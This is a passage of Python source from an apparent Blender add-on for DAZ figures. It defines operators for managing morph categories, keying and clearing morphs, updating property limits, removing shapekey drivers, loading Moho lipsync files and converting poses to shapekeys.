ob.keys():\r\n del ob[key]\r\n\r\n\r\nclass DAZ_OT_ChangeCategoryCancel(bpy.types.Operator, CatGroupString):\r\n bl_idname = \"daz.change_category_cancel\"\r\n bl_label = \"Cancel\"\r\n bl_description = \"Cancel category change\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n attr = getOpenAttr(self.catgroup)\r\n setattr(context.scene, attr, False)\r\n return {'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_ChangeCategory(bpy.types.Operator, CatGroupString, ActionString):\r\n bl_idname = \"daz.change_category\"\r\n bl_label = \"Change Category\"\r\n bl_description = \"Rename or remove category\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE')\r\n\r\n def execute(self, context):\r\n ob = context.object\r\n scn = context.scene\r\n categories = getattr(ob, self.catgroup)\r\n enums = EnumProperty(\r\n items = [(cat.name, cat.name, cat.name) for cat in categories],\r\n name = self.catgroup[3:-4])\r\n setattr(bpy.types.Scene, \"%sContent\" % self.catgroup, enums)\r\n\r\n attr = getOpenAttr(self.catgroup)\r\n setattr(context.scene, attr, True)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------------\r\n# Apply morphs\r\n#------------------------------------------------------------------------\r\n\r\ndef getShapeKeyCoords(ob):\r\n coords = [v.co for v in ob.data.vertices]\r\n skeys = []\r\n if ob.data.shape_keys:\r\n for skey in ob.data.shape_keys.key_blocks[1:]:\r\n if abs(skey.value) > 1e-4:\r\n coords = [co + skey.value*(skey.data[n].co - ob.data.vertices[n].co) for n,co in enumerate(coords)]\r\n skeys.append(skey)\r\n return skeys,coords\r\n\r\n\r\ndef applyMorphs(rig, props):\r\n for ob in rig.children:\r\n basic = ob.data.shape_keys.key_blocks[0]\r\n skeys,coords = getShapeKeyCoords(ob)\r\n for skey in skeys:\r\n path = 'key_blocks[\"%s\"].value' % skey.name\r\n getDrivingProps(ob.data.shape_keys, path, props)\r\n ob.shape_key_remove(skey)\r\n basic = ob.data.shape_keys.key_blocks[0]\r\n ob.shape_key_remove(basic)\r\n for vn,co in enumerate(coords):\r\n ob.data.vertices[vn].co = co\r\n print(\"Morphs applied\")\r\n\r\n\r\ndef getDrivingProps(rna, channel, props):\r\n if rna.animation_data:\r\n for fcu in rna.animation_data.drivers:\r\n for var in fcu.driver.variables:\r\n for trg in var.targets:\r\n prop = trg.data_path.split('\"')[1]\r\n props[prop] = trg.id\r\n\r\n\r\ndef removeDrivingProps(rig, props):\r\n for prop,id in props.items():\r\n if rig == id:\r\n del rig[prop]\r\n\r\n for cat in rig.DazCategories:\r\n showname = \"DazShow\" + cat.name\r\n if hasattr(rig, showname):\r\n delattr(rig, showname)\r\n rig.DazCategories.remove(cat)\r\n\r\n#------------------------------------------------------------------------\r\n# Select and unselect all\r\n#------------------------------------------------------------------------\r\n\r\nclass Activator(PrefixString, TypeString, CatGroupString):\r\n def execute(self, context):\r\n from .driver import setBoolProp\r\n rig = getRigFromObject(context.object)\r\n keys = getRelevantMorphs(rig, self.type, self.prefix, self.catgroup)\r\n if self.type == \"CUSTOM\":\r\n for key in keys:\r\n setBoolProp(rig, \"DzA\"+key.prop, self.activate)\r\n else:\r\n for key in keys:\r\n setBoolProp(rig, \"DzA\"+key, self.activate)\r\n return{'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_ActivateAll(bpy.types.Operator, Activator):\r\n bl_idname = \"daz.activate_all\"\r\n bl_label = \"Select All\"\r\n bl_description = \"Select all morphs of this type\"\r\n bl_options = {'UNDO'}\r\n\r\n activate = True\r\n\r\n\r\nclass DAZ_OT_DeactivateAll(bpy.types.Operator, Activator):\r\n bl_idname = \"daz.deactivate_all\"\r\n bl_label = \"Unselect All\"\r\n bl_description = \"Unselect all morphs of this type\"\r\n bl_options = {'UNDO'}\r\n\r\n activate = False\r\n\r\n#------------------------------------------------------------------------\r\n# Prettifying\r\n#------------------------------------------------------------------------\r\n\r\ndef prettifyAll(context):\r\n scn = context.scene\r\n for ob in getSceneObjects(context):\r\n if ob.type == 'ARMATURE':\r\n for prop in ob.keys():\r\n if prop[0:7] == \"DazShow\":\r\n setattr(bpy.types.Object, prop, BoolProperty(default=True))\r\n elif prop[0:3] in [\"DzA\", \"Mhh\", \"DzM\"]:\r\n setattr(bpy.types.Object, prop, BoolProperty(default=True)) \r\n\r\n\r\nclass DAZ_OT_Prettify(bpy.types.Operator):\r\n bl_idname = \"daz.prettify\"\r\n bl_label = \"Prettify Panels\"\r\n bl_description = (\r\n \"Change sliders to checkboxes\\n\" +\r\n \"(If boolean options appear as sliders, use this button to refresh them)\"\r\n )\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n prettifyAll(context)\r\n return{'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Update scene\r\n#------------------------------------------------------------------\r\n\r\nclass DAZ_OT_ForceUpdate(bpy.types.Operator):\r\n bl_idname = \"daz.force_update\"\r\n bl_label = \"Update\"\r\n bl_description = \"Force all morphs to update\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n updateScene(context)\r\n rig = getRigFromObject(context.object)\r\n updateRig(rig, context)\r\n updateDrivers(context.object)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Clear morphs\r\n#------------------------------------------------------------------\r\n\r\ndef getRelevantMorphs(rig, type, prefix, catgroup):\r\n morphs = []\r\n if rig is None:\r\n return morphs\r\n if type == \"CUSTOM\":\r\n for cat in getattr(rig, catgroup):\r\n morphs += cat.morphs\r\n elif rig.DazNewStyleExpressions:\r\n for key in rig.keys():\r\n if key[0:3] == prefix:\r\n morphs.append(key)\r\n else:\r\n names = theMorphNames[type]\r\n for key in rig.keys():\r\n name = nameFromKey(key, names, rig)\r\n if name and isinstance(rig[key], float):\r\n morphs.append(key)\r\n return morphs\r\n\r\n\r\ndef clearMorphs(rig, type, prefix, catgroup, scn, frame, force):\r\n keys = getRelevantMorphs(rig, type, prefix, catgroup)\r\n\r\n if type == \"CUSTOM\":\r\n for key in keys:\r\n if isActive(rig, key.prop, force) and not rig[key.prop] == 0.0:\r\n rig[key.prop] = 0.0\r\n autoKeyProp(rig, key.prop, scn, frame, force)\r\n else:\r\n for key in keys:\r\n if isActive(rig, key, force) and not rig[key] == 0.0:\r\n rig[key] = 0.0\r\n autoKeyProp(rig, key, scn, frame, force)\r\n\r\n\r\ndef updateMorphs(rig, type, prefix, catgroup, scn, frame, force):\r\n keys = getRelevantMorphs(rig, type, prefix, catgroup)\r\n for key in keys:\r\n if isActive(rig, key):\r\n autoKeyProp(rig, key, scn, frame, force)\r\n\r\n\r\ndef nameFromKey(key, names, rig):\r\n key = key.lower()\r\n if rig.DazRig == \"genesis8\":\r\n keyhd = key + \"_hd\"\r\n if keyhd in names.keys():\r\n return names[keyhd]\r\n elif \"e\"+keyhd in names.keys():\r\n return names[\"e\"+keyhd]\r\n if key in names.keys():\r\n return names[key]\r\n elif \"e\"+key in names.keys():\r\n return names[\"e\"+key]\r\n else:\r\n for end1,end2 in [(\"in-out\", \"out-in\")]:\r\n n = len(end1)\r\n for prefix in [\"e\", \"\"]:\r\n stem = prefix+key[:-n]\r\n if key[-n:] == end1 and stem+end2 in names.keys():\r\n return names[stem+end2]\r\n elif key[-n:] == end2 and stem+end1 in names.keys():\r\n return names[stem+end1]\r\n return None\r\n\r\n\r\nclass DAZ_OT_ClearMorphs(bpy.types.Operator, TypePrefixCat):\r\n bl_idname = \"daz.clear_morphs\"\r\n bl_label = \"Clear\"\r\n bl_description = \"Set all morphs of specified type to zero\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n clearMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current, False)\r\n updateRig(rig, context)\r\n if scn.tool_settings.use_keyframe_insert_auto:\r\n updateScene(context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n\r\n\r\nclass DAZ_OT_UpdateMorphs(bpy.types.Operator, KeyString, TypePrefixCat):\r\n bl_idname = \"daz.update_morphs\"\r\n bl_label = \"Update\"\r\n bl_description = \"Set keys at current frame for all props of specified type with keys\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type in ['MESH', 'ARMATURE'])\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n updateMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Add morphs to keyset\r\n#------------------------------------------------------------------\r\n\r\ndef addKeySet(rig, type, prefix, catgroup, scn, frame):\r\n if rig is None:\r\n return\r\n aksi = scn.keying_sets.active_index\r\n if aksi <= -1:\r\n aks = scn.keying_sets.new(idname = \"daz_morphs\", name = \"daz_morphs\")\r\n aks = scn.keying_sets.active\r\n if type == \"CUSTOM\":\r\n for cat in getattr(rig, catgroup):\r\n for morph in cat.morphs:\r\n path = \"[\" + '\"' + morph.prop + '\"' + \"]\"\r\n aks.paths.add(rig.id_data, path)\r\n elif rig.DazNewStyleExpressions:\r\n for key in rig.keys():\r\n if key[0:3] == prefix:\r\n path = \"[\" + '\"' + key + '\"' + \"]\"\r\n aks.paths.add(rig.id_data, path)\r\n else:\r\n names = theMorphNames[type]\r\n for key in rig.keys():\r\n name = nameFromKey(key, names, rig)\r\n if name and isinstance(rig[key], float):\r\n path = \"[\" + '\"' + key + '\"' + \"]\"\r\n aks.paths.add(rig.id_data, path)\r\n\r\n\r\nclass DAZ_OT_AddKeysets(bpy.types.Operator, TypePrefixCat):\r\n bl_idname = \"daz.add_keyset\"\r\n bl_label = \"Keyset\"\r\n bl_description = \"Add category morphs to active custom keying set, or make new one\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n from .finger import getFingeredCharacter\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n addKeySet(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Set morph keys\r\n#------------------------------------------------------------------\r\n\r\ndef keyMorphs(rig, type, prefix, catgroup, scn, frame):\r\n if rig is None:\r\n return\r\n if type == \"CUSTOM\":\r\n for cat in getattr(rig, catgroup):\r\n for morph in cat.morphs:\r\n if morph.prop in rig.keys() and isActive(rig, morph.prop):\r\n keyProp(rig, morph.prop, frame)\r\n elif rig.DazNewStyleExpressions:\r\n for key in rig.keys():\r\n if key[0:3] == prefix and isActive(rig, key):\r\n keyProp(rig, key, frame)\r\n else:\r\n names = theMorphNames[type]\r\n for key in rig.keys():\r\n name = nameFromKey(key, names, rig)\r\n if name and isinstance(rig[key], float):\r\n keyProp(rig, key, frame)\r\n\r\n\r\nclass DAZ_OT_KeyMorphs(bpy.types.Operator, TypePrefixCat):\r\n bl_idname = \"daz.key_morphs\"\r\n bl_label = \"Set Keys\"\r\n bl_description = \"Set keys for all morphs of specified type at current frame\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n keyMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Remove morph keys\r\n#------------------------------------------------------------------\r\n\r\ndef unkeyMorphs(rig, type, prefix, catgroup, scn, frame):\r\n if rig is None:\r\n return\r\n if type == \"CUSTOM\":\r\n for cat in getattr(rig, catgroup):\r\n for morph in cat.morphs:\r\n if morph.prop in rig.keys() and isActive(rig, morph.prop):\r\n unkeyProp(rig, morph.prop, frame)\r\n elif rig.DazNewStyleExpressions:\r\n for key in rig.keys():\r\n if key[0:3] == prefix and isActive(rig, key):\r\n unkeyProp(rig, key, frame)\r\n else:\r\n names = theMorphNames[type]\r\n for key in rig.keys():\r\n name = nameFromKey(key, names, rig)\r\n if name and isinstance(rig[key], float):\r\n unkeyProp(rig, key, frame)\r\n\r\n\r\nclass DAZ_OT_UnkeyMorphs(bpy.types.Operator, TypePrefixCat):\r\n bl_idname = \"daz.unkey_morphs\"\r\n bl_label = \"Remove Keys\"\r\n bl_description = \"Remove keys from all morphs of specified type at current frame\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n unkeyMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Update property limits\r\n#------------------------------------------------------------------\r\n\r\ndef getCustomProps(ob):\r\n props = []\r\n for catgroup in [\"DazMorphCats\", \"DazPoseCats\"]:\r\n for cat in getattr(ob, catgroup):\r\n props += [morph.prop for morph in cat.morphs]\r\n return props\r\n\r\n\r\ndef updatePropLimits(rig, context):\r\n from .driver import getShapekeyBoneDriver, setFloatProp\r\n scn = context.scene\r\n min = scn.DazPropMin\r\n max = scn.DazPropMax\r\n props = getCustomProps(rig)\r\n for ob in rig.children:\r\n if ob.type == 'MESH' and ob.data.shape_keys:\r\n for skey in ob.data.shape_keys.key_blocks:\r\n if skey.name in props or skey.name[0:2] == \"Dz\":\r\n skey.slider_min = min\r\n skey.slider_max = max\r\n\r\n for prop in rig.keys():\r\n if (prop in props or \r\n (prop[0:2] == \"Dz\" and prop[0:3] != \"DzA\")):\r\n setFloatProp(rig, prop, rig[prop], min, max)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n print(\"Property limits updated\")\r\n\r\n\r\nclass DAZ_OT_UpdatePropLimits(bpy.types.Operator):\r\n bl_idname = \"daz.update_prop_limits\"\r\n bl_label = \"Update Property Limits\"\r\n bl_description = \"Update min and max value for properties\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return context.object\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n updatePropLimits(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Remove morphs\r\n#------------------------------------------------------------------\r\n\r\ndef removeAllMorphDrivers(rig, scn, prefix):\r\n from .driver import removeRigDrivers, removeTypedDrivers\r\n setupMorphPaths(scn, False)\r\n removeRigDrivers(rig)\r\n removeSelfRefs(rig)\r\n removeProps(rig, prefix)\r\n for ob in rig.children:\r\n if ob.type == 'MESH' and ob.data.shape_keys:\r\n removeTypedDrivers(ob.data.shape_keys, 'SINGLE_PROP')\r\n removeProps(ob, prefix)\r\n\r\n\r\ndef removeSelfRefs(rig):\r\n for pb in rig.pose.bones:\r\n if len(pb.constraints) > 0:\r\n cns = pb.constraints[0]\r\n if (cns.mute and\r\n cns.name == \"Do Not Touch\"):\r\n pb.constraints.remove(cns)\r\n\r\n\r\ndef removeProps(ob, prefix):\r\n ob.DazCustomMorphs = ob.DazCustomPoses = False\r\n for catgroup in [\"DazMorphCats\", \"DazPoseCats\"]:\r\n for cat in getattr(ob, catgroup):\r\n key = \"DazShow\"+cat.name\r\n if hasattr(ob, key):\r\n setattr(ob, key, False)\r\n for morph in cat.morphs:\r\n key = morph.prop\r\n if key in ob.keys():\r\n ob[key] = 0.0\r\n del ob[key]\r\n\r\n n = len(prefix)\r\n for key in ob.keys():\r\n if key[0:n] == prefix:\r\n ob[key] = 0.0\r\n del ob[key]\r\n for type in theMorphNames.keys():\r\n key = \"Daz\"+type\r\n if key in ob.keys():\r\n ob[key] = False\r\n del ob[key]\r\n\r\n\r\nclass DAZ_OT_RemoveMorphDrivers(bpy.types.Operator):\r\n bl_idname = \"daz.remove_morph_drivers\"\r\n bl_label = \"Remove Morph Drivers\"\r\n bl_description = \"Remove drivers associated with morphs (not corrective shapekeys)\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return context.object\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n removeAllMorphDrivers(rig, context.scene, \"Dz\")\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#-------------------------------------------------------------\r\n# Add and remove driver\r\n#-------------------------------------------------------------\r\n\r\ndef getActiveShapeKey(ob):\r\n if ob.active_shape_key_index == 0:\r\n raise DazError(\"Cannot add/remove driver to first shapekey\")\r\n skey = ob.active_shape_key\r\n if skey is None:\r\n raise DazError(\"Object %s has no active shapekey\" % ob.name)\r\n return skey\r\n\r\n\r\nclass DAZ_OT_AddDriver(bpy.types.Operator):\r\n bl_idname = \"daz.add_shapekey_driver\"\r\n bl_label = \"Add Driver\"\r\n bl_description = \"Add rig driver to active shapekey\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n self.addDriver(context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n def addDriver(self, context):\r\n from .driver import makeShapekeyDriver\r\n ob = context.object\r\n skey = getActiveShapeKey(ob)\r\n rig = ob.parent\r\n if (rig and rig.type == 'ARMATURE'):\r\n sname = skey.name\r\n makeShapekeyDriver(ob, sname, skey.value, rig, sname)\r\n addToCategories(rig, [sname], \"Shapekeys\")\r\n ob.DazCustomMorphs = True\r\n rig.DazCustomMorphs = True\r\n\r\n\r\nclass DAZ_OT_RemoveDriver(bpy.types.Operator):\r\n bl_idname = \"daz.remove_shapekey_driver\"\r\n bl_label = \"Remove Driver\"\r\n bl_description = \"Remove rig driver from active shapekey\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n self.removeDriver(context.object)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n def removeDriver(self, ob):\r\n skey = getActiveShapeKey(ob)\r\n removeShapekeyDriver(ob, skey)\r\n rig = ob.parent\r\n if (rig and rig.type == 'ARMATURE' and\r\n skey.name in rig.keys()):\r\n del rig[skey.name]\r\n\r\n\r\ndef removeShapekeyDriver(ob, skey):\r\n adata = ob.data.shape_keys.animation_data\r\n if (adata and adata.drivers):\r\n for fcu in adata.drivers:\r\n words = fcu.data_path.split('\"')\r\n if (words[0] == \"key_blocks[\" and\r\n words[1] == skey.name):\r\n ob.data.shape_keys.driver_remove(fcu.data_path)\r\n return\r\n raise DazError(\"Did not find driver for shapekey %s\" % skey.name)\r\n\r\n#-------------------------------------------------------------\r\n#\r\n#-------------------------------------------------------------\r\n\r\ndef getRigFromObject(ob):\r\n if ob.type == 'ARMATURE':\r\n return ob\r\n else:\r\n ob = ob.parent\r\n if ob is None or ob.type != 'ARMATURE':\r\n return None\r\n return ob\r\n\r\n\r\nclass DAZ_OT_ToggleAllCats(bpy.types.Operator, UseOpenBool):\r\n bl_idname = \"daz.toggle_all_cats\"\r\n bl_label = \"Toggle All Categories\"\r\n bl_description = \"Toggle all morph categories on and off\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n ob = getRigFromObject(context.object)\r\n if ob:\r\n for key in ob.keys():\r\n if key[0:7] == \"DazShow\":\r\n ob[key] = self.useOpen\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#-------------------------------------------------------------\r\n#\r\n#-------------------------------------------------------------\r\n\r\ndef isActive(rig, key, force=False):\r\n if force:\r\n return True\r\n elif \"DzA\"+key in rig.keys():\r\n return rig[\"DzA\"+key]\r\n else:\r\n return True\r\n\r\n\r\ndef keyProp(rig, key, frame):\r\n rig.keyframe_insert('[\"%s\"]' % key, frame=frame)\r\n\r\n\r\ndef unkeyProp(rig, key, frame):\r\n rig.keyframe_delete('[\"%s\"]' % key, frame=frame)\r\n\r\n\r\ndef getPropFCurves(rig, key):\r\n if rig.animation_data and rig.animation_data.action:\r\n path = '[\"%s\"]' % key\r\n return [fcu for fcu in rig.animation_data.action.fcurves if path == fcu.data_path]\r\n return []\r\n\r\n\r\ndef autoKeyProp(rig, key, scn, frame, force):\r\n if scn.tool_settings.use_keyframe_insert_auto:\r\n if force or getPropFCurves(rig, key):\r\n keyProp(rig, key, frame)\r\n\r\n\r\ndef pinProp(rig, scn, key, type, prefix, catgroup, frame):\r\n if rig:\r\n clearMorphs(rig, type, prefix, catgroup, scn, frame, True)\r\n rig[key] = 1.0\r\n autoKeyProp(rig, key, scn, frame, True)\r\n\r\n\r\nclass DAZ_OT_PinProp(bpy.types.Operator, KeyString, TypePrefixCat):\r\n bl_idname = \"daz.pin_prop\"\r\n bl_label = \"\"\r\n bl_description = \"Pin property\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type in ['MESH', 'ARMATURE'])\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n scn = context.scene\r\n setupMorphPaths(scn, False)\r\n pinProp(rig, scn, self.key, self.type, self.prefix, self.catgroup, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n# ---------------------------------------------------------------------\r\n# Load Moho\r\n# ---------------------------------------------------------------------\r\n\r\nMoho = {\r\n \"rest\" : \"Rest\",\r\n \"etc\" : \"K\",\r\n \"AI\" : \"AA\",\r\n \"O\" : \"OU\",\r\n \"U\" : \"OW\",\r\n \"WQ\" : \"AH\",\r\n \"L\" : \"L\",\r\n \"E\" : \"EH\",\r\n \"MBP\" : \"M\",\r\n \"FV\" : \"F\"\r\n}\r\n\r\ndef getVisemesPrefix(rig):\r\n return Visemes[rig.DazVisemes][2]\r\n\r\n\r\ndef loadMoho(context, filepath, offs):\r\n from .fileutils import safeOpen\r\n scn = context.scene\r\n ob = context.object\r\n if ob.type == 'ARMATURE':\r\n rig = ob\r\n elif ob.type == 'MESH':\r\n rig = ob.parent\r\n else:\r\n rig = None\r\n if rig is None:\r\n return\r\n setActiveObject(context, rig)\r\n bpy.ops.object.mode_set(mode='POSE')\r\n if rig.DazNewStyleExpressions:\r\n vprefix = \"DzV\"\r\n prefix = \"DzV\"\r\n else:\r\n vprefix = getVisemesPrefix(rig)\r\n prefix = \"\"\r\n auto = scn.tool_settings.use_keyframe_insert_auto\r\n scn.tool_settings.use_keyframe_insert_auto = True\r\n fp = safeOpen(filepath, \"rU\")\r\n for line in fp:\r\n words= line.split()\r\n if len(words) < 2:\r\n pass\r\n else:\r\n frame = int(words[0]) + offs\r\n if words[1] == \"rest\":\r\n clearMorphs(rig, \"Visemes\", prefix, None, scn, frame, True)\r\n else:\r\n key = vprefix + Moho[words[1]]\r\n print(\"MOI\", frame, words[1], key)\r\n pinProp(rig, scn, key, \"Visemes\", prefix, None, frame)\r\n fp.close()\r\n #setInterpolation(rig)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n scn.tool_settings.use_keyframe_insert_auto = auto\r\n print(\"Moho file %s loaded\" % filepath)\r\n\r\n\r\nclass DAZ_OT_LoadMoho(bpy.types.Operator, DatFile, SingleFile):\r\n bl_idname = \"daz.load_moho\"\r\n bl_label = \"Load Moho\"\r\n bl_description = \"Load Moho (.dat) file\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n loadMoho(context, self.filepath, 1.0)\r\n return{'FINISHED'}\r\n\r\n def invoke(self, context, event):\r\n context.window_manager.fileselect_add(self)\r\n return {'RUNNING_MODAL'}\r\n\r\n# ---------------------------------------------------------------------\r\n# Delete lipsync\r\n# ---------------------------------------------------------------------\r\n\r\ndef getArmature(ob):\r\n if ob.type == 'MESH':\r\n ob = ob.parent\r\n if ob and ob.type == 'ARMATURE':\r\n return ob\r\n return None\r\n\r\n\r\ndef deleteLipsync(rig):\r\n if rig.animation_data is None:\r\n return\r\n act = rig.animation_data.action\r\n if act is None:\r\n return\r\n if rig.MhxFaceShapeDrivers:\r\n for fcu in act.fcurves:\r\n if (fcu.data_path[0:5] == '[\"Mhf' and\r\n fcu.data_path[5:9] in [\"mout\", \"lips\", \"tong\"]):\r\n act.fcurves.remove(fcu)\r\n for key in getMouthShapes():\r\n rig[\"Mhf\"+key] = 0.0\r\n elif rig.MhxFacePanel:\r\n for key in getMouthShapes():\r\n pb,_fac,idx = getBoneFactor(rig, key)\r\n path = 'pose.bones[\"%s\"].location' % pb.name\r\n for fcu in act.fcurves:\r\n if fcu.data_path == path:\r\n act.fcurves.remove(fcu)\r\n pb.location[idx] = 0.0\r\n\r\n\r\nclass DAZ_OT_DeleteLipsync(bpy.types.Operator):\r\n bl_idname = \"daz.delete_lipsync\"\r\n bl_label = \"Delete Lipsync\"\r\n bl_description = \"Delete F-curves associated with lipsync\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n rig = getArmature(context.object)\r\n if rig:\r\n deleteLipsync(rig)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n return{'FINISHED'}\r\n\r\n#-------------------------------------------------------------\r\n# Convert pose to shapekey\r\n#-------------------------------------------------------------\r\n\r\nclass DAZ_OT_ConvertMorphsToShapes(bpy.types.Operator, MorphTypes):\r\n bl_idname = \"daz.convert_morphs_to_shapes\"\r\n bl_label = \"Convert Morphs To Shapes\"\r\n bl_description = \"Convert face rig poses to shapekeys\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def draw(self, context):\r\n self.layout.prop(self, \"units\")\r\n self.layout.prop(self, \"expressions\")\r\n self.layout.prop(self, \"visemes\")\r\n self.layout.prop(self, \"other\")\r\n\r\n def execute(self, context):\r\n try:\r\n ob = context.object\r\n rig = ob.parent\r\n if rig and rig.type == 'ARMATURE':\r\n self.convertToShapes(context, rig, ob)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n def invoke(self, context, event):\r\n context.window_manager.invoke_props_dialog(self)\r\n return {'RUNNING_MODAL'}\r\n \r\n \r\n def convertToShapes(self, context, rig, ob): \r\n from .daz import getPropGroupProps\r\n keys = getPropGroupProps(rig)\r\n keys.sort()\r\n for key in keys:\r\n rig[key] = 0.0\r\n for key in keys:\r\n mname = self.getMorphName(key, ob)\r\n if (ob.data.shape_keys and \r\n mname in ob.data.shape_keys.key_blocks.keys()):\r\n continue\r\n if mname:\r\n for mod in ob.modifiers:\r\n if mod.type == 'ARMATURE':\r\n rig[key] = 1.0\r\n updateScene(context)\r\n updateRig(rig, context)\r\n self.applyArmature(ob, rig, mod, mname)\r\n rig[key] = 0.0\r\n break\r\n updateScene(context)\r\n updateRig(rig, context)\r\n updateDrivers(rig)\r\n\r\n\r\n def getMorphName(self, key, ob):\r\n if key[0:3] == \"DzU\" and self.units:\r\n return key[3:]\r\n if key[0:3] == \"DzE\" and self.expressions:\r\n return key[3:]\r\n if key[0:3] == \"DzV\" and self.visemes:\r\n return key[3:]\r\n if self.other and key[0:2] != \"Dz\" and key[0:3] != \"Daz\":\r\n return key\r\n return None \r\n \r\n\r\n def applyArmature(self, ob, rig, mod, mname):\r\n mod.name = mname\r\n bpy.ops.object.modifier_apply(apply_as='SHAPE', modifier=mname)\r\n skey = ob.data.shape_keys.key_blocks[mname]\r\n skey.value = 0.0\r\n offsets = [(skey.data[vn].co - v.co).length for vn,v in enumerate(ob.data.vertices)]\r\n omax = max(offsets)\r\n omin = min(offsets)\r\n eps = 1e-2 * ob.DazScale # eps = 0.1 mm\r\n if abs(omax) < eps and abs(omin) < eps:\r\n idx = ob.data.shape_keys.key_blocks.keys().index(skey.name)\r\n ob.active_shape_key_index = idx\r\n bpy.ops.object.shape_key_remove()\r\n ob.active_shape_key_index = 0\r\n nmod = ob.modifiers.new(rig.name, \"ARMATURE\")\r\n nmod.object = rig\r\n nmod.use_deform_preserve_volume = True \r\n for i in range(len(ob.modifiers)-1):\r\n bpy.ops.object.modifier_move_up(modifier=nmod.name)\r\n\r\n#-------------------------------------------------------------\r\n# Property groups, for drivers\r\n#-------------------------------------------------------------\r\n\r\nclasses = [\r\n DAZ_OT_Update,\r\n DAZ_OT_SelectAll,\r\n DAZ_OT_SaveFavorites,\r\n DAZ_OT_LoadFavorites,\r\n DAZ_OT_LoadAllUnits,\r\n DAZ_OT_LoadAllExpressions,\r\n DAZ_OT_LoadAllVisemes,\r\n DAZ_OT_LoadAllCorrectives,\r\n DAZ_OT_ImportMorph,\r\n DAZ_OT_RenameCategoryOK,\r\n DAZ_OT_RemoveCategoryOK,\r\n DAZ_OT_ChangeCategoryCancel,\r\n 